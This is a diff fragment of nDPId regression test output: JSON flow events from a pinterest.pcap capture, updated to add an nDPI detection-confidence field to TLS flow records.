 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17596,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605289733420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289733420,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgpjo6IrgBAB+6D8AAABAQgKxbpMosK5bSM="}
-00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17597,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289733399,"flow_last_seen":1605289733421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289733421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00965{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17600,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289733399,"flow_last_seen":1605289733466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605289733466,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-02830{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17606,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289733399,"flow_last_seen":1605289733468,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":479,"midstream":0,"ts_msec":1605289733468,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","server_names":"f4.shared.global.fastly.net,*.500px.com,*.500px.net,*.500px.org,*.acceptance.habitat.sh,*.api.swiftype.com,*.art19.com,*.brave.com,*.chef.co,*.chef.io,*.cookpad.com,*.evbstatic.com,*.eventbrite.com,*.experiencepoint.com,*.fs.pastbook.com,*.fs.quploads.com,*.ftcdn.net,*.fubo.tv,*.getchef.com,*.githash.fubo.tv,*.habitat.sh,*.inspec.io,*.issuu.com,*.isu.pub,*.jimdo-dev-staging.com,*.jimdo-stable-staging.com,*.lulus.com,*.mansion-market.com,*.marfeel.com,*.massrel.io,*.meetu.ps,*.meetup.com,*.meetupstatic.com,*.newrelic.com,*.opscode.com,*.perimeterx.net,*.production.cdn.art19.com,*.staging.art19.com,*.staging.cdn.art19.com,*.swiftype.com,*.tissuu.com,*.video.franklyinc.com,*.wikihow.com,*.worldnow.com,500px.com,500px.net,500px.org,a1.awin1.com,acceptance.habitat.sh,api.swiftype.com,app.birchbox.com,app.staging.birchbox.com,app.staging.birchbox.es,art19.com,brave.com,cdn-f.adsmoloco.com,cdn.evbuc.com,cdn.polyfills.io,chef.co,chef.io,content.gamefuel.info,evbuc.com,experiencepoint.com,fast.appcues.com,fast.wistia.com,fast.wistia.net,fast.wistia.st,fubo.tv,getchef.com,githash.fubo.tv,habitat.sh,hbbtv.6play.fr,houstontexans.com,insight.atpi.com,inspec.io,jimdo-dev-staging.com,jimdo-stable-staging.com,link.sg.booking.com,mansion-market.com,media.bunited.com,meetu.ps,meetup.com,meetupstatic.com,onairhls.malimarcdn.net,opscode.com,perimeterx.net,polyfill.webservices.ft.com,qa.polyfills.io,raiders.com,s.sg.booking.com,s.swiftypecdn.com,static.birchbox.com,swiftype.com,viverepiusani.it,wikihow.com,wistia.com,www.dwin2.com,www.houstontexans.com,www.raiders.com,www.wada-ama.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=f4.shared.global.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"BE:28:82:77:5B:06:41:1F:70:84:BD:A4:B9:FB:F0:BC:B1:B5:E3:A0"}}
-00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17597,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289733399,"flow_last_seen":1605289733421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289733421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17600,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289733399,"flow_last_seen":1605289733466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605289733466,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+02856{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17606,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289733399,"flow_last_seen":1605289733468,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":479,"midstream":0,"ts_msec":1605289733468,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","server_names":"f4.shared.global.fastly.net,*.500px.com,*.500px.net,*.500px.org,*.acceptance.habitat.sh,*.api.swiftype.com,*.art19.com,*.brave.com,*.chef.co,*.chef.io,*.cookpad.com,*.evbstatic.com,*.eventbrite.com,*.experiencepoint.com,*.fs.pastbook.com,*.fs.quploads.com,*.ftcdn.net,*.fubo.tv,*.getchef.com,*.githash.fubo.tv,*.habitat.sh,*.inspec.io,*.issuu.com,*.isu.pub,*.jimdo-dev-staging.com,*.jimdo-stable-staging.com,*.lulus.com,*.mansion-market.com,*.marfeel.com,*.massrel.io,*.meetu.ps,*.meetup.com,*.meetupstatic.com,*.newrelic.com,*.opscode.com,*.perimeterx.net,*.production.cdn.art19.com,*.staging.art19.com,*.staging.cdn.art19.com,*.swiftype.com,*.tissuu.com,*.video.franklyinc.com,*.wikihow.com,*.worldnow.com,500px.com,500px.net,500px.org,a1.awin1.com,acceptance.habitat.sh,api.swiftype.com,app.birchbox.com,app.staging.birchbox.com,app.staging.birchbox.es,art19.com,brave.com,cdn-f.adsmoloco.com,cdn.evbuc.com,cdn.polyfills.io,chef.co,chef.io,content.gamefuel.info,evbuc.com,experiencepoint.com,fast.appcues.com,fast.wistia.com,fast.wistia.net,fast.wistia.st,fubo.tv,getchef.com,githash.fubo.tv,habitat.sh,hbbtv.6play.fr,houstontexans.com,insight.atpi.com,inspec.io,jimdo-dev-staging.com,jimdo-stable-staging.com,link.sg.booking.com,mansion-market.com,media.bunited.com,meetu.ps,meetup.com,meetupstatic.com,onairhls.malimarcdn.net,opscode.com,perimeterx.net,polyfill.webservices.ft.com,qa.polyfills.io,raiders.com,s.sg.booking.com,s.swiftypecdn.com,static.birchbox.com,swiftype.com,viverepiusani.it,wikihow.com,wistia.com,www.dwin2.com,www.houstontexans.com,www.raiders.com,www.wada-ama.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=f4.shared.global.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"BE:28:82:77:5B:06:41:1F:70:84:BD:A4:B9:FB:F0:BC:B1:B5:E3:A0"}}
+00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1605289714558,"flow_last_seen":1605289715083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7864,"flow_avg_l4_payload_len":191,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1605289717548,"flow_last_seen":1605289731068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2450,"flow_tot_l4_payload_len":49723,"flow_avg_l4_payload_len":394,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1605289732972,"flow_last_seen":1605289733399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":24849,"flow_avg_l4_payload_len":407,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1605289733399,"flow_last_seen":1605289733529,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":18931,"flow_avg_l4_payload_len":394,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Media"}}
-00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1605289714558,"flow_last_seen":1605289715083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7864,"flow_avg_l4_payload_len":191,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1605289717548,"flow_last_seen":1605289731068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2450,"flow_tot_l4_payload_len":49723,"flow_avg_l4_payload_len":394,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1605289732972,"flow_last_seen":1605289733399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":24849,"flow_avg_l4_payload_len":407,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
+00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1605289733399,"flow_last_seen":1605289733529,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":18931,"flow_avg_l4_payload_len":394,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}}
+00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":224,"flow_first_seen":1605289715133,"flow_last_seen":1605289716126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31408,"flow_tot_l4_payload_len":306085,"flow_avg_l4_payload_len":1366,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":224,"flow_first_seen":1605289715133,"flow_last_seen":1605289716126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31408,"flow_tot_l4_payload_len":306085,"flow_avg_l4_payload_len":1366,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00606{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00606{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
